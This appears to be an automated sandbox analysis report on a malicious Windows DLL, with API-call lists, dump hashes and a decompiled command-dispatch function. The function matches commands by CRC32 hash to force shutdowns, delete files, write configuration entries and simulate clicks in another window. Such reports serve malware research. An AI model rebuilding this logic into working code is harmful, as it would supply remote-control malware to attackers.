                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 709876AA
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?), ref: 709876B1
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 709876B8
                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 709876EA
                                                                                                        • NtOpenProcess.NTDLL ref: 70987750
                                                                                                        • GetModuleFileNameExW.PSAPI(?,00000000,?,00000104), ref: 7098776C
                                                                                                        • RtlMoveMemory.NTDLL(?,00000000,?), ref: 7098779C
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000410,?,?), ref: 709877A3
                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000410,?,?), ref: 709877AA
                                                                                                        • NtClose.NTDLL(?), ref: 709877B5
                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 709877FA
                                                                                                        • GetDlgItemTextA.USER32 ref: 70987811
                                                                                                        • StrChrA.SHLWAPI(7098CDD8,00000020,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987847
                                                                                                        • StrTrimA.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 70987852
                                                                                                        • GetDlgItemTextA.USER32 ref: 70987896
                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 709879DF
                                                                                                        • WritePrivateProfileStringW.KERNEL32 ref: 70987A54
                                                                                                        • GetProcessHeap.KERNEL32 ref: 70987AE8
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987AEF
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000000,00B7EA60), ref: 70987AF7
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00B7EA60), ref: 70987AFE
                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000001C,007837D8,?,00000000,00B7EA60), ref: 70987B33
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70987B3A
                                                                                                        • CreateThread.KERNEL32 ref: 70987B66
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 70987B6D
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 70987B78
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 70987B89
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70987B90
                                                                                                        • RtlZeroMemory.NTDLL(?,00000008), ref: 70987BAA
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000008), ref: 70987BB7
                                                                                                        • RtlTimeToSecondsSince1970.NTDLL ref: 70987BE1
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 70987C09
                                                                                                        • StrChrW.SHLWAPI(7098CDA0,00000025,?), ref: 70987C35
                                                                                                        • wsprintfW.USER32 ref: 70987C44
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70987C66
                                                                                                        • SetEvent.KERNEL32(?), ref: 70987C8D
                                                                                                        • SetTimer.USER32(00000000,00000000,0000003C,00000000), ref: 70987CA3
                                                                                                        • DispatchMessageW.USER32 ref: 70987CB9
                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 70987CCA
                                                                                                        • KillTimer.USER32(00000000,00000000), ref: 70987CDC
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 70987CE9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Heap$MemoryProcess$Free$MoveZero$PrivateProfileTimer$MessageStringTextTimeVirtualWindow$AllocCloseFileItemKillSleepThreadWritewsprintf$CharComputeCrc32CreateDispatchEventForegroundHandleInfoLocaleLowerModuleNameNumbersOpenSecondsSince1970SystemTrimVersionlstrlen
                                                                                                        • String ID: ($g$g
                                                                                                        • API String ID: 3902037593-2003133257
                                                                                                        • Opcode ID: 0d0e4da37cb1bce770013482c06b4907a50d66610f42646c300ba7671c4b3f90
                                                                                                        • Instruction ID: 83c701da498bc4b73fc86bb78e5b2d38ed70344f94504811a330f3819e5b7a14
                                                                                                        • Opcode Fuzzy Hash: 0d0e4da37cb1bce770013482c06b4907a50d66610f42646c300ba7671c4b3f90
                                                                                                        • Instruction Fuzzy Hash: 6C626CB2518341AFD320DF65C884B6BB7E9BB88704F10892DF69687391E774E944CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70985F30, Relevance: 128.5, APIs: 69, Strings: 4, Instructions: 797memorysleepwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E70985F30(void* _a4) {
				void* _v30;
				short _v538;
				short _v542;
				short _v546;
				short _v550;
				struct _TOKEN_PRIVILEGES _v562;
				long _v564;
				short _v566;
				int _v568;
				signed int _v574;
				intOrPtr _v576;
				void* _v580;
				long _v582;
				WCHAR* _v586;
				intOrPtr _v590;
				intOrPtr* _v594;
				intOrPtr _v606;
				void* __ebx;
				void* __edi;
				void* __ebp;
				WCHAR** _t107;
				void* _t108;
				void* _t111;
				signed int _t123;
				void* _t126;
				int _t135;
				int _t140;
				int _t145;
				int _t148;
				WCHAR* _t149;
				long _t158;
				WCHAR* _t159;
				long _t164;
				int _t167;
				int _t172;
				WCHAR* _t173;
				WCHAR* _t177;
				int _t188;
				WCHAR* _t194;
				WCHAR* _t201;
				short* _t206;
				int _t209;
				WCHAR* _t211;
				int _t212;
				int _t213;
				int _t214;
				short* _t216;
				WCHAR* _t217;
				struct HWND__* _t231;
				signed short* _t235;
				int _t236;
				int _t237;
				short* _t239;
				WCHAR* _t245;
				WCHAR* _t246;
				void* _t248;
				int _t249;
				intOrPtr _t265;
				intOrPtr _t267;
				void* _t270;
				intOrPtr _t276;
				struct HWND__* _t277;
				signed int _t278;
				int _t279;
				intOrPtr _t288;
				intOrPtr _t292;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t303;
				intOrPtr _t304;
				struct HWND__* _t309;
				WCHAR* _t310;
				void* _t316;
				intOrPtr _t317;
				int _t318;
				long _t319;
				WCHAR** _t326;
				signed int _t328;
				int _t336;
				intOrPtr _t339;
				int _t340;
				int _t341;
				void* _t343;
				void* _t345;
				void* _t350;
				void* _t383;
				void* _t384;

				_t248 = _a4;
				_t341 = 0;
				_v568 = 0;
				_t107 = CommandLineToArgvW( *(_t248 + 0xc),  &_v568);
				_v580 = _t107;
				if(_t107 == 0) {
					L132:
					_t108 =  *_t248;
					if(_t108 != _t341) {
						WaitForSingleObject(_t108, 0xffffffff);
						CloseHandle( *_t248);
					}
					HeapFree(GetProcessHeap(), _t341,  *(_t248 + 0xc));
					_t111 =  *(_t248 + 0x14);
					if(_t111 != _t341) {
						HeapFree(GetProcessHeap(), _t341, _t111);
					}
					HeapFree(GetProcessHeap(), _t341, _t248);
					return 0;
				}
				if(_v576 <= 0) {
					L131:
					LocalFree(_v580);
					goto L132;
				}
				_t326 = _t107;
				CharLowerW( *_t326);
				_t123 =  *( *_t326) & 0x0000ffff;
				if(_t123 < 0x61 || _t123 > 0x7a) {
					if(_t123 != 0x21) {
						E70985EE0(_t248, 4, _t341, _t341);
						goto L131;
					}
					goto L5;
				} else {
					L5:
					_t126 = HeapAlloc(GetProcessHeap(), 8, 0x800);
					_v568 = _t126;
					if(_t126 == _t341) {
						goto L131;
					}
					_v564 = _t341;
					_t316 = E7098A7A0( *_t326, _t341,  &_v564);
					_t345 = _t343 + 0xc;
					if(_t316 == _t341) {
						L106:
						E70985EE0(_t248, 4, _t341, _t341);
						L129:
						HeapFree(GetProcessHeap(), _t341, _v568);
						goto L131;
					}
					_t328 = RtlComputeCrc32(_t341, _t316, _v564) ^ 0x4b4ca51f;
					HeapFree(GetProcessHeap(), _t341, _t316);
					_t383 = _t328 - 0x626a2952;
					if(_t383 > 0) {
						__eflags = _t328 - 0xbb630037;
						if(__eflags > 0) {
							__eflags = _t328 - 0xd3699067;
							if(__eflags > 0) {
								__eflags = _t328 - 0xdfa9ddb3;
								if(_t328 == 0xdfa9ddb3) {
									L108:
									__eflags = _v586 - 3;
									if(_v586 >= 3) {
										_t249 = 0;
										_v542 = 0;
										__eflags = _t328 - 0x18946dc0;
										if(_t328 != 0x18946dc0) {
											_t317 = _v590;
											_t135 = ExpandEnvironmentStringsW( *(_t317 + 8),  &_v542, 0x104);
											__eflags = _t135;
											if(_t135 == 0) {
												L114:
												_t288 =  *0x7098f5cc; // 0xb757b8
												_push( *(_t317 + 8));
												_push(_t288);
												wsprintfW( &_v546, StrChrW(0x7098c658, 0x25));
												_t345 = _t345 + 0x10;
												L115:
												_t318 = StrRChrW( &_v538, 0, 0x5c);
												__eflags = _t318;
												if(_t318 != 0) {
													__eflags = 0;
													 *_t318 = 0;
												}
												_t140 =  &_v546;
												__imp__SHCreateDirectoryExW(0, _t140, 0);
												__eflags = _t318;
												if(_t318 != 0) {
													 *_t318 = 0x5c;
												}
												__eflags = _t140;
												if(_t140 == 0) {
													L122:
													_push( &(_v562.Privileges));
													_push( *((intOrPtr*)(_v606 + 4)));
													_t249 = E70985DF0();
													_t345 = _t345 + 8;
													__eflags = _t249;
													if(_t249 == 0) {
														goto L128;
													}
													__eflags = _t328 - 0xf8b15039;
													if(_t328 != 0xf8b15039) {
														__eflags = _t328 - 0x18946dc0;
														if(_t328 != 0x18946dc0) {
															goto L128;
														}
														_t145 = E709827F0( &(_v562.Privileges));
														_t345 = _t345 + 4;
														L127:
														_t249 = _t145;
														goto L128;
													}
													_push(0);
													_push(0);
													_push(1);
													_t145 = E709844E0(StrChrW(0x7098cd68, 0x6f),  &(_v562.Privileges), 0);
													_t345 = _t345 + 0x18;
													goto L127;
												} else {
													__eflags = _t140 - 0x50;
													if(_t140 == 0x50) {
														goto L122;
													}
													__eflags = _t140 - 0xb7;
													if(_t140 != 0xb7) {
														L128:
														E70985EE0(_v30, _t249, 0, 0);
														_t248 = _v30;
														_t341 = 0;
														__eflags = 0;
														goto L129;
													}
													goto L122;
												}
											}
											_t148 = PathIsRelativeW( &_v542);
											__eflags = _t148;
											if(_t148 == 0) {
												goto L115;
											}
											goto L114;
										}
										_t149 = StrChrW(0x7098c490, 0x2e);
										_t292 =  *0x7098f5cc; // 0xb757b8
										_push(_t149);
										_push( *((intOrPtr*)(_v594 + 8)));
										_push(_t292);
										wsprintfW( &_v550, StrChrW(0x7098ca08, 0x25));
										_t345 = _t345 + 0x14;
										goto L115;
									}
									E70985EE0(_t248, 2, _t341, _t341);
									goto L129;
								}
								__eflags = _t328 - 0xf21ab3a9;
								if(_t328 == 0xf21ab3a9) {
									E709853B0(5, _t341, 1);
									goto L129;
								}
								__eflags = _t328 - 0xf8b15039;
								if(_t328 == 0xf8b15039) {
									goto L108;
								}
								goto L106;
							}
							if(__eflags == 0) {
								_v582 = GetTickCount();
								_t158 = RtlRandom( &_v582);
								__eflags = _v586 - 1;
								_push(0x2e);
								_t319 = _t158;
								_push(0x7098ca24);
								if(_v586 <= 1) {
									_t159 = StrChrW();
									_t293 =  *0x7098f5cc; // 0xb757b8
									_push(_t159);
									_push( *_v594);
									_push(_t293);
									wsprintfW( &_v550, StrChrW(0x7098ca08, 0x25));
									_t350 = _t345 + 0x14;
								} else {
									_t173 = StrChrW();
									_t265 =  *0x7098f5cc; // 0xb757b8
									_push(_t173);
									_push(_t319);
									_push(0x75);
									_push(_t265);
									wsprintfW( &_v550, StrChrW(0x7098c44c, 0x25));
									_t350 = _t345 + 0x18;
								}
								__eflags = _v586 - 1;
								if(_v586 <= 1) {
									L99:
									_t164 = GetFileAttributesW( &_v542);
									__eflags = _t164 - 0xffffffff;
									if(_t164 == 0xffffffff) {
										L15:
										E70985EE0(_t248, _t341, _t341, _t341);
										goto L129;
									}
									goto L100;
								} else {
									_push( &_v542);
									_push( *((intOrPtr*)(_v590 + 4)));
									_t172 = E70985DF0();
									_t350 = _t350 + 8;
									__eflags = _t172;
									if(_t172 != 0) {
										L100:
										_t294 =  *0x7098f5cc; // 0xb757b8
										_t167 = E70982EC0( &_v542, _t294, 1);
										__eflags = _t167;
										if(_t167 != 0) {
											E70985EE0(_t248, 1, _t341, _t341);
											E709853B0(5, 1, _t341);
										}
										DeleteFileW( &_v542);
										goto L129;
									}
									goto L99;
								}
							}
							__eflags = _t328 - 0xbc0ec42e;
							if(_t328 == 0xbc0ec42e) {
								__eflags = _v586 - 2;
								if(_v586 >= 2) {
									_push( *(_t248 + 0xc) + 2 + _v574 * 2);
									_t177 = StrChrW(0x7098caf4, 0x63);
									_t267 =  *0x7098f578; // 0xb63c90
									_push(_t177);
									_push(_t267);
									wsprintfW(_v586, StrChrW(0x7098cd74, 0x22));
									_push( &_v582);
									_push(0x384);
									_v582 = _t341;
									__eflags = E70982FF0(_v586) - _t341;
									E70985EE0(_t248, 0 | E70982FF0(_v586) != _t341, _t180, _v582);
									goto L129;
								}
								L92:
								E70985EE0(_t248, 2, _t341, _t341);
								goto L129;
							}
							__eflags = _t328 - 0xbfdca397;
							if(_t328 == 0xbfdca397) {
								_push(_t341);
								_push(_t341);
								_push(0x65);
								L47:
								_push(E70985500());
								_push(_t248);
								E70985EE0();
								goto L129;
							}
							__eflags = _t328 - 0xcc6430a1;
							if(_t328 != 0xcc6430a1) {
								goto L106;
							}
							L78:
							__eflags = _v586 - 2;
							if(_v586 >= 2) {
								_push( *(_t248 + 0xc) + 2 + _v574 * 2);
								wsprintfW(_v582, StrChrW(0x7098cd90, 0x2f));
								__eflags = _t328 - 0xcc6430a1;
								if(_t328 == 0xcc6430a1) {
									L84:
									_t270 = 0x384;
									L85:
									__eflags = _t328 - 0x6410b9df;
									if(_t328 == 0x6410b9df) {
										L88:
										_t188 = 0;
										__eflags = 0;
										L89:
										_push(_t341);
										_push(_t270);
										_push(_t188);
										E70985EE0(_t248, E709844E0(_t341, StrChrW(0x7098caf4, 0x63), _v574), _t341, _t341);
										goto L129;
									}
									__eflags = _t328 - 0xcc6430a1;
									if(_t328 == 0xcc6430a1) {
										goto L88;
									}
									_t188 = 1;
									goto L89;
								}
								__eflags = _t328 - 0xc762885;
								if(_t328 == 0xc762885) {
									goto L84;
								}
								__eflags = _t328 - 0x626a2952;
								if(_t328 == 0x626a2952) {
									goto L84;
								}
								_t270 = 0;
								goto L85;
							}
							E70985EE0(_t248, 2, _t341, _t341);
							goto L129;
						}
						if(__eflags == 0) {
							goto L78;
						}
						__eflags = _t328 - 0x943d2ddd;
						if(__eflags > 0) {
							__eflags = _t328 - 0x9fca843f;
							if(_t328 == 0x9fca843f) {
								__eflags = _v586 - 2;
								_push(0x2e);
								_push(0x7098c490);
								if(_v586 >= 2) {
									_t194 = StrChrW();
									_t303 =  *0x7098f5cc; // 0xb757b8
									_push(_t194);
									_push( *((intOrPtr*)(_v594 + 4)));
									_push(_t303);
									wsprintfW( &_v550, StrChrW(0x7098ca08, 0x25));
									E70985EE0(_t248, DeleteFileW( &_v542), _t341, _t341);
								} else {
									_t201 = StrChrW();
									_t304 =  *0x7098f5cc; // 0xb757b8
									E70985EE0(_t248, E70982EF0(_t304, _t201), _t341, _t341);
								}
								goto L129;
							}
							__eflags = _t328 - 0xacb58718;
							if(_t328 == 0xacb58718) {
								L65:
								__eflags = _v586 - 1;
								if(_v586 <= 1) {
									L69:
									E709853B0(5, 0, _t341);
									goto L129;
								}
								_t206 =  *((intOrPtr*)(_v590 + 4));
								__eflags =  *_t206 - 0x67;
								if( *_t206 != 0x67) {
									goto L69;
								}
								__eflags =  *((intOrPtr*)(_t206 + 2)) - _t341;
								if( *((intOrPtr*)(_t206 + 2)) != _t341) {
									goto L69;
								}
								E709853B0(5, 1, _t341);
								goto L129;
							}
							__eflags = _t328 - 0xadfefee8;
							if(_t328 != 0xadfefee8) {
								goto L106;
							}
							L56:
							_t209 = OpenProcessToken(0xffffffff, 0x28,  &_v582);
							__eflags = _t209;
							if(_t209 == 0) {
								L64:
								E70985EE0(_t248, _t341, _t341, _t341);
								goto L129;
							}
							_t211 =  *0x7098f618; // 0x74cec0
							_t212 = LookupPrivilegeValueW(_t341, _t211,  &(_v562.Privileges));
							__eflags = _t212;
							if(_t212 == 0) {
								goto L64;
							}
							_v562.PrivilegeCount = 1;
							_v550 = 2;
							_t213 = AdjustTokenPrivileges(_v582, _t341,  &_v562, _t341, _t341, _t341);
							__eflags = _t213;
							if(_t213 == 0) {
								goto L64;
							}
							asm("sbb esi, esi");
							_t336 = ( ~(_t328 - 0x8a1f2193) & 0x00000006) + 2;
							__eflags = _v586 - 1;
							if(_v586 > 1) {
								_t216 =  *((intOrPtr*)(_v590 + 4));
								__eflags =  *_t216 - 0x66;
								if( *_t216 == 0x66) {
									__eflags =  *((intOrPtr*)(_t216 + 2)) - _t341;
									if( *((intOrPtr*)(_t216 + 2)) == _t341) {
										_t336 = _t336 | 0x00000014;
										__eflags = _t336;
									}
								}
							}
							_t214 = ExitWindowsEx(_t336, _t341);
							__eflags = _t214 - _t341;
							if(_t214 != _t341) {
								goto L129;
							} else {
								goto L64;
							}
						}
						if(__eflags == 0) {
							__eflags = _v586 - 2;
							if(_v586 >= 2) {
								_t217 = StrChrW(0x7098c490, 0x2e);
								_t276 =  *0x7098f5cc; // 0xb757b8
								_push(_t217);
								_push( *((intOrPtr*)(_v594 + 4)));
								_push(_t276);
								wsprintfW( &_v550, StrChrW(0x7098ca08, 0x25));
								E70985EE0(_t248, E709827F0( &_v542), _t341, _t341);
							} else {
								_push(_t341);
								_push(StrChrW(0x7098c490, 0x2e));
								E70982960();
								E70985EE0(_t248, 1, _t341, _t341);
							}
							goto L129;
						}
						__eflags = _t328 - 0x8a1f2193;
						if(__eflags > 0) {
							__eflags = _t328 - 0x8e221263;
							if(_t328 != 0x8e221263) {
								goto L106;
							}
							_push(_t341);
							_push(_t341);
							_push(0x75);
							goto L47;
						}
						if(__eflags == 0) {
							goto L56;
						}
						__eflags = _t328 - 0x6410b9df;
						if(_t328 == 0x6410b9df) {
							goto L78;
						}
						__eflags = _t328 - 0x86815470;
						if(_t328 != 0x86815470) {
							goto L106;
						}
						_push(_t341);
						_push(_t341);
						_push(0x66);
						goto L47;
					}
					if(_t383 == 0) {
						goto L78;
					}
					_t384 = _t328 - 0x18946dc0;
					if(_t384 > 0) {
						__eflags = _t328 - 0x4c65f376;
						if(_t328 == 0x4c65f376) {
							E70985640(_t341, _t341);
							goto L129;
						}
						__eflags = _t328 - 0x52034854;
						if(_t328 == 0x52034854) {
							L36:
							_t309 =  *0x7098f3c8; // 0x0
							PostMessageW(GetDlgItem(_t309, 0x4e83), 0x111, 0x9cb6, _t341);
							_t231 =  *0x7098f3cc; // 0x0
							PostMessageW(_t231, 0x201, 1, 0x490017);
							Sleep(0x64);
							_t277 =  *0x7098f3cc; // 0x0
							PostMessageW(_t277, 0x202, _t341, 0x490017);
							Sleep(0x7d0);
							E70985EE0(_t248, 1, _t341, _t341);
							goto L129;
						}
						__eflags = _t328 - 0x61445d46;
						if(_t328 != 0x61445d46) {
							goto L106;
						}
						_t310 = _v586;
						__eflags = _t310 - 2;
						if(_t310 >= 2) {
							_t339 = _v590;
							_t235 =  *(_t339 + 4);
							_t278 =  *_t235 & 0x0000ffff;
							__eflags = _t278 - 0x69;
							if(_t278 != 0x69) {
								L24:
								__eflags = _t278 - 0x72;
								if(_t278 != 0x72) {
									goto L92;
								}
								__eflags = _t235[1] - _t341;
								if(_t235[1] != _t341) {
									goto L92;
								} else {
									_t279 = 0;
									__eflags = 0;
									L27:
									__eflags = _t310 - 2;
									if(_t310 <= 2) {
										L31:
										_t236 = 0;
										__eflags = 0;
										L32:
										_push(_t236);
										_push(_t279);
										_t237 = E709847A0(_t248, _t316);
										_t350 = _t345 + 8;
										__eflags = _t237;
										if(_t237 == 0) {
											goto L15;
										}
										_t340 = 5;
										do {
											Sleep(0x3e8);
											_t340 = _t340 - 1;
											__eflags = _t340;
										} while (_t340 != 0);
										E709853B0(5, 1, _t341);
										goto L129;
									}
									_t239 =  *((intOrPtr*)(_t339 + 8));
									__eflags =  *_t239 - 0x66;
									if( *_t239 != 0x66) {
										goto L31;
									}
									__eflags =  *((intOrPtr*)(_t239 + 2)) - _t341;
									if( *((intOrPtr*)(_t239 + 2)) != _t341) {
										goto L31;
									}
									_t236 = 1;
									goto L32;
								}
							}
							__eflags = _t235[1] - _t341;
							if(_t235[1] != _t341) {
								goto L24;
							} else {
								_t279 = 1;
								goto L27;
							}
						} else {
							E70985EE0(_t248, 2, _t341, _t341);
							goto L129;
						}
					}
					if(_t384 == 0) {
						goto L108;
					}
					if(_t328 == 0x93e54f7) {
						goto L36;
					}
					if(_t328 == 0xc762885) {
						goto L78;
					}
					if(_t328 != 0x162d6deb) {
						goto L106;
					}
					_v582 = GetTickCount();
					_push(RtlRandom( &_v582));
					wsprintfW( &_v566, StrChrW(0x7098cda0, 0x25));
					_t245 =  *0x7098f57c; // 0xb7ea60
					_t345 = _t345 + 0xc;
					_t246 =  *0x7098f5a0; // 0xb61638
					_v562.PrivilegeCount = 0;
					_v566 = 0x640067;
					if(WritePrivateProfileStringW(_t246,  &_v566,  &(_v562.Privileges), _t245) != 0) {
						goto L65;
					}
					goto L15;
				}
			}


























































































                                                                                                        0x70985f37
                                                                                                        0x70985f49
                                                                                                        0x70985f4c
                                                                                                        0x70985f50
                                                                                                        0x70985f62
                                                                                                        0x70985f68
                                                                                                        0x709868bc
                                                                                                        0x709868bc
                                                                                                        0x709868c0
                                                                                                        0x709868c5
                                                                                                        0x709868ce
                                                                                                        0x709868ce
                                                                                                        0x709868dc
                                                                                                        0x709868de
                                                                                                        0x709868e3
                                                                                                        0x709868ea
                                                                                                        0x709868ea
                                                                                                        0x709868f1
                                                                                                        0x709868ff
                                                                                                        0x709868ff
                                                                                                        0x70985f72
                                                                                                        0x709868a5
                                                                                                        0x709868aa
                                                                                                        0x00000000
                                                                                                        0x709868b6
                                                                                                        0x70985f78
                                                                                                        0x70985f7d
                                                                                                        0x70985f85
                                                                                                        0x70985f8b
                                                                                                        0x70985f95
                                                                                                        0x7098689d
                                                                                                        0x00000000
                                                                                                        0x709868a2
                                                                                                        0x00000000
                                                                                                        0x70985f9b
                                                                                                        0x70985f9b
                                                                                                        0x70985fa9
                                                                                                        0x70985faf
                                                                                                        0x70985fb5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985fc6
                                                                                                        0x70985fcf
                                                                                                        0x70985fd1
                                                                                                        0x70985fd6
                                                                                                        0x709866f0
                                                                                                        0x709866f5
                                                                                                        0x70986883
                                                                                                        0x70986890
                                                                                                        0x00000000
                                                                                                        0x70986890
                                                                                                        0x70985fec
                                                                                                        0x70985ff9
                                                                                                        0x70985fff
                                                                                                        0x70986005
                                                                                                        0x70986202
                                                                                                        0x70986208
                                                                                                        0x70986482
                                                                                                        0x70986488
                                                                                                        0x709866d8
                                                                                                        0x709866de
                                                                                                        0x70986714
                                                                                                        0x70986714
                                                                                                        0x70986719
                                                                                                        0x70986735
                                                                                                        0x70986737
                                                                                                        0x7098673c
                                                                                                        0x70986742
                                                                                                        0x70986777
                                                                                                        0x70986789
                                                                                                        0x7098678f
                                                                                                        0x70986791
                                                                                                        0x709867a2
                                                                                                        0x709867a5
                                                                                                        0x709867ab
                                                                                                        0x709867ac
                                                                                                        0x709867bc
                                                                                                        0x709867c2
                                                                                                        0x709867c5
                                                                                                        0x709867d4
                                                                                                        0x709867d6
                                                                                                        0x709867d8
                                                                                                        0x709867da
                                                                                                        0x709867dc
                                                                                                        0x709867dc
                                                                                                        0x709867e1
                                                                                                        0x709867e8
                                                                                                        0x709867ee
                                                                                                        0x709867f0
                                                                                                        0x709867f7
                                                                                                        0x709867f7
                                                                                                        0x709867fa
                                                                                                        0x709867fc
                                                                                                        0x7098680a
                                                                                                        0x70986815
                                                                                                        0x70986816
                                                                                                        0x7098681c
                                                                                                        0x7098681e
                                                                                                        0x70986821
                                                                                                        0x70986823
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986825
                                                                                                        0x7098682b
                                                                                                        0x7098684e
                                                                                                        0x70986854
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098685b
                                                                                                        0x70986860
                                                                                                        0x70986863
                                                                                                        0x70986863
                                                                                                        0x00000000
                                                                                                        0x70986863
                                                                                                        0x7098682d
                                                                                                        0x7098682f
                                                                                                        0x70986831
                                                                                                        0x70986844
                                                                                                        0x70986849
                                                                                                        0x00000000
                                                                                                        0x709867fe
                                                                                                        0x709867fe
                                                                                                        0x70986801
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70986803
                                                                                                        0x70986808
                                                                                                        0x70986865
                                                                                                        0x70986872
                                                                                                        0x70986877
                                                                                                        0x70986881
                                                                                                        0x70986881
                                                                                                        0x00000000
                                                                                                        0x70986881
                                                                                                        0x00000000
                                                                                                        0x70986808
                                                                                                        0x709867fc
                                                                                                        0x70986798
                                                                                                        0x7098679e
                                                                                                        0x709867a0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709867a0
                                                                                                        0x7098674b
                                                                                                        0x7098674d
                                                                                                        0x70986753
                                                                                                        0x7098675b
                                                                                                        0x7098675c
                                                                                                        0x7098676c
                                                                                                        0x70986772
                                                                                                        0x00000000
                                                                                                        0x70986772
                                                                                                        0x70986720
                                                                                                        0x00000000
                                                                                                        0x70986725
                                                                                                        0x709866e0
                                                                                                        0x709866e6
                                                                                                        0x70986707
                                                                                                        0x00000000
                                                                                                        0x7098670c
                                                                                                        0x709866e8
                                                                                                        0x709866ee
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709866ee
                                                                                                        0x7098648e
                                                                                                        0x709865ee
                                                                                                        0x709865f7
                                                                                                        0x709865fd
                                                                                                        0x70986608
                                                                                                        0x7098660a
                                                                                                        0x7098660c
                                                                                                        0x70986611
                                                                                                        0x7098663a
                                                                                                        0x7098663c
                                                                                                        0x70986642
                                                                                                        0x70986649
                                                                                                        0x7098664a
                                                                                                        0x7098665a
                                                                                                        0x70986660
                                                                                                        0x70986613
                                                                                                        0x70986613
                                                                                                        0x70986615
                                                                                                        0x7098661b
                                                                                                        0x7098661c
                                                                                                        0x7098661d
                                                                                                        0x7098661f
                                                                                                        0x7098662f
                                                                                                        0x70986635
                                                                                                        0x70986635
                                                                                                        0x70986663
                                                                                                        0x70986668
                                                                                                        0x70986683
                                                                                                        0x70986688
                                                                                                        0x7098668e
                                                                                                        0x70986691
                                                                                                        0x709860ac
                                                                                                        0x709860b0
                                                                                                        0x00000000
                                                                                                        0x709860b5
                                                                                                        0x00000000
                                                                                                        0x7098666a
                                                                                                        0x70986675
                                                                                                        0x70986676
                                                                                                        0x70986677
                                                                                                        0x7098667c
                                                                                                        0x7098667f
                                                                                                        0x70986681
                                                                                                        0x70986697
                                                                                                        0x70986697
                                                                                                        0x709866a5
                                                                                                        0x709866ad
                                                                                                        0x709866af
                                                                                                        0x709866b6
                                                                                                        0x709866c0
                                                                                                        0x709866c5
                                                                                                        0x709866cd
                                                                                                        0x00000000
                                                                                                        0x709866cd
                                                                                                        0x00000000
                                                                                                        0x70986681
                                                                                                        0x70986668
                                                                                                        0x70986494
                                                                                                        0x7098649a
                                                                                                        0x70986567
                                                                                                        0x7098656c
                                                                                                        0x70986591
                                                                                                        0x70986599
                                                                                                        0x7098659b
                                                                                                        0x709865a1
                                                                                                        0x709865a2
                                                                                                        0x709865b2
                                                                                                        0x709865bc
                                                                                                        0x709865bd
                                                                                                        0x709865c3
                                                                                                        0x709865d2
                                                                                                        0x709865db
                                                                                                        0x00000000
                                                                                                        0x709865e0
                                                                                                        0x7098656e
                                                                                                        0x70986573
                                                                                                        0x00000000
                                                                                                        0x70986578
                                                                                                        0x709864a0
                                                                                                        0x709864a6
                                                                                                        0x7098655e
                                                                                                        0x7098655f
                                                                                                        0x70986560
                                                                                                        0x7098624c
                                                                                                        0x70986254
                                                                                                        0x70986255
                                                                                                        0x70986256
                                                                                                        0x00000000
                                                                                                        0x7098625b
                                                                                                        0x709864ac
                                                                                                        0x709864b2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x709864b8
                                                                                                        0x709864b8
                                                                                                        0x709864bd
                                                                                                        0x709864e2
                                                                                                        0x709864f2
                                                                                                        0x709864fb
                                                                                                        0x70986501
                                                                                                        0x70986517
                                                                                                        0x70986517
                                                                                                        0x7098651c
                                                                                                        0x7098651c
                                                                                                        0x70986522
                                                                                                        0x70986533
                                                                                                        0x70986533
                                                                                                        0x70986533
                                                                                                        0x70986535
                                                                                                        0x70986535
                                                                                                        0x70986536
                                                                                                        0x70986537
                                                                                                        0x70986551
                                                                                                        0x00000000
                                                                                                        0x70986556
                                                                                                        0x70986524
                                                                                                        0x7098652a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x7098652c
                                                                                                        0x00000000
                                                                                                        0x7098652c
                                                                                                        0x70986503
                                                                                                        0x70986509
                                                                                                        0x00000000
                                                                                                        0x00000000
